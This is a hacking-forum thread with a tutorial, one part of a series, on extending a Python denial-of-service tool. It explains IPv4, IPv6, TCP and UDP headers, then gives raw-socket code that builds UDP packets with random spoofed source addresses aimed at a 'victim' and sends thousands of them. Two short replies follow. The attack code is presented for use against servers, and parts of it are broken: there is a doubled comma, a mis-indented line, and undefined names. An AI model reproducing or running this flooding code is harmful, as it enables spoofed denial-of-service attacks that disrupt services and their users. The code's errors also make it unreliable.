Sinisterly

Full Version: PyDoSing extended 2 - Upgrading your python DOS tool SPOOFING
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
These tutorials require no order, you may do them in any order you like.
Previous - https://www.sinister.ly/Thread-Tutorial-...ARALLELISM
First - https://www.sinister.ly/Thread-PyDoSing-...n-DoS-Tool

This tutorial will go in depth into how packets are made, and we will be using VERY low-level socket functions in this tutorial, it might benefit you to open up notepad, and copy/past the following ascii pictures.

Pictures!
Spoiler:
IPv4 Header packet:
Spoiler:
Code:
IPv4 Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------|-----------|-----------------|-----|-----------------------------------------------|
|  Version  |   IHL     |      DSCP       | ECN |                  Total Length                 |
|-----------------------------------------------|-----------------------------------------------|
|                 Identification                |  Flags |       Fragment offset                |
|-----------------------------------------------|-----------------------------------------------|
|    Time to live       |         Protocol      |                Header Checksum                |
|-----------------------------------------------------------------------------------------------|
|                                        Source IP Address                                      |
|-----------------------------------------------------------------------------------------------|
|                                       Destination IP Address                                  |
|-----------------------------------------------------------------------------------------------|
IPv6 Header:
Spoiler:
Code:
IPv6 Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------------------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7  8  9  10 11|12 13 14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------|-----------------------|-----------|-----------------------------------------------|
|  Version  |     Trafic class      |                      Flow label                           |
|-----------------------------------------------------------------------------------------------|
|                    Length                     |       Next header     |       Hop limit       |
|-----------------------------------------------------------------------------------------------|
|                                                                                               |
|                                         Source Address                                        |
|                                                                                               |
|                                                                                               |
|-----------------------------------------------------------------------------------------------|
|                                                                                               |
|                                      Destination Address                                      |
|                                                                                               |
|                                                                                               |
|-----------------------------------------------------------------------------------------------|
TCP packet Header:
Spoiler:
Code:
TCP header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------------------------------------------|-----------------------------------------------|
|                   Source port                 |              Destination port                 |
|-----------------------------------------------|-----------------------------------------------|
|Data offset|Reserved|       Flags              |                 Window Size                   |
|-----------------------------------------------|-----------------------------------------------|
|                  Checksum                     |              Urgent pointer (if used)         |
|-----------------------------------------------------------------------------------------------|
UDP packet Header:
Spoiler:
Code:
UDP Header:
|-----------------------------------------------------------------------------------------------|
|           0           |           1           |           2           |           3           |
|-----------------------|-----------------------|-----------------------|-----------------------|
|0  1  2  3 |4  5  6  7 |8  9  10 11 12 13|14 15|16 17 18 19 20 21 22 23|24 25 26 27 28 29 30 31|
|-----------------------------------------------|-----------------------------------------------|
|                  Source Port                  |             Destination Port                  |
|-----------------------------------------------|-----------------------------------------------|
|                    Length                     |                    Checksum                   |
|-----------------------------------------------------------------------------------------------|

The numbers at the very top are the bytes, while the numbers below it are bits. The entire diagrams represents the packet we want to send.

At the heart of DoS'ing is networking, and I will be explaining how to construct your packets from scratch, which means you can spoof any information you want in it.

Constructing a packet
There are multiple parts to a packet, depending on what protocol you are using. To start off, you ALWAYS need an IPv4/IPv6 header, and then a UDP/TCP header. Be aware that there are IPv6 "Jumbograms" that might (depending on the service you're attacking) be useful in upping the attack power of a DoS. Jumbograms do not use UDP/TCP.

For the purposes of this tutorial, I will modify the DOS tool from the original script to send an IPv4 packet, using UDP, with a spoofed IP address.

Makeing an IPv4 Header:
A while ago, I wrote a script that constructed packets from scratch, I'm simply copy/pasteing the code here
Code:
##Get the ip address of our victim and store it in a variable "victim"
spoof = str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))
ipheader = pack('!BBHHHBBH4s4s',
              85, #IHL version
              0, #Type of service
              0, #Total length, will automatically fill in correct lenghth
              54321, #Global id of this packet
              0, #Fragment offset
              255, #Time to live
              socket.IPPROTO_UDP, #Protocol
              0, #Header checksum, will automatically fill
              socket.inet_aton(spoof), #Our spoofed IP address
              socket.inet_aton(victim)) #The IP address of our victim
The 'pack' function is imported from a library called 'struct', which allows us to pack variables as binary data. Paraphrasing from the python reference here:
Character (!) - network (= big-endian)
Size: Standard
Alignment: None

Format characters:

Character(B) - Unsigned Char
Spoiler:
Python type: Integer
Standard size: 1
Notes:When attempting to pack a non-integer using any of the integer conversion codes, if the non-integer has a __index__() method then that method is called to convert the argument to an integer before packing.
Character(H) - Unsigned Short
Spoiler:
Python type: Integer
Standard size: 2
Notes:When attempting to pack a non-integer using any of the integer conversion codes, if the non-integer has a __index__() method then that method is called to convert the argument to an integer before packing.
Character(s) - char[]
Spoiler:
Python type: Bytes
Standard size: *

If you refer to those pretty pictures in your notpad, you'll see that '!BBHHHBBH4s4s' corresponds with the diagram for the IPv4 packet.

Making a UDP header
Now, we need a UDP packet, refer to the diagram. You'll notice that there's a big 2-byte slot called a "checksum". These are 2 bytes for the target computer to check that it got all the data, and none of it was lost along the way. Since we really don't care about our data being correct, we can save some processor cycles and leave it blank. To be sure you know how to use the pack function, go ahead and create the UDP header, and check it with the code below.
Spoiler:
Code:
udpheader = pack('!HHHH',
                         0, #Source port
                         80, #Destination port, depends on the protocol the server is useing, 80 is commonly used for websites.
                         0, #Length, automatically filled in
                         0) #Checksum, left blank

The payload
Now that we have the IPv4 and UDP headers, all that is left is the payload. The payload can be anything you want. If you send a valid request, you can even tie up some server resources. Since I used port 80 in my udp header, and port 80 is used for http, I'll send a http request. If you're attacking different servers, look up the RFC to see what port they run on, and what a valid request might be.

Spoiler:
Code:
httpget = b'GET /index.html HTTP/1.1\nHost: www.example.com'
packet = ipheader+ udpheader + httpget

Bringing it all together
And finally, we can integrate this all back into our DoS script, with a socket type of SOCK_RAW
Spoiler:
Code:
##import socket, struct, and Random
##Get a target, and port to attack

def makepacket(victim, port):
    spoof = str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))+"."+str(random.randint(0,255))
    ipheader = pack('!BBHHHBBH4s4s',
                  85, #IHL version
                  0, #Type of service
                  0, #Total length, will automatically fill in correct lenghth
                  54321, #Global id of this packet
                  0, #Fragment offset
                  255, #Time to live
                  socket.IPPROTO_UDP, #Protocol
                  0, #Header checksum, will automatically fill
                  socket.inet_aton(spoof), #Our spoofed IP address
                  socket.inet_aton(victim)) #The IP address of our victim
     udpheader = pack('!HHHH',
                             0, #Source port
                             80, #Destination port, depends on the protocol the server is useing, 80 is commonly used for websites.
                             0, #Length, automatically filled in
                             0) #Checksum, filled in later
    httpget = b'GET /index.html HTTP/1.1\nHost: www.example.com'
    packet = ipheader+ udpheader + httpget
    return packet


def dos(target, port,packet):
    try:
      (socket.socket(socket.AF_INET,,socket.SOCK_RAW,socket.IPPROTO_RAW)).send(packet)
    except error: pass

if __name__ == '__main__':
    for i in range(0,(random.randint(5000,50000))):
        dos(targ,por,makepacket(targ, por))


I put a lot of work into writing this tutorial, if you copy/paste it somewhere else, or see it somewhere else, please link back here!

Next - https://www.sinister.ly/Thread-Tutorial-...ol-METHODS

Thanks for reading! Comments, criticisms, ect. below!
(04-15-2014, 12:11 AM)3SidedSquare Wrote: [ -> ]Makeing an IPv4 Header:

>Makeing
Most domestic ISPs have started to check source IPs of outgoing ckets, meaning for most people you won't be spoofing.
(04-18-2014, 02:04 AM)w00t Wrote: [ -> ]Most domestic ISPs have started to check source IPs of outgoing ckets, meaning for most people you won't be spoofing.

I wasn't aware, could you point me to a list of popular ISP's that do this so I can add it to the OP?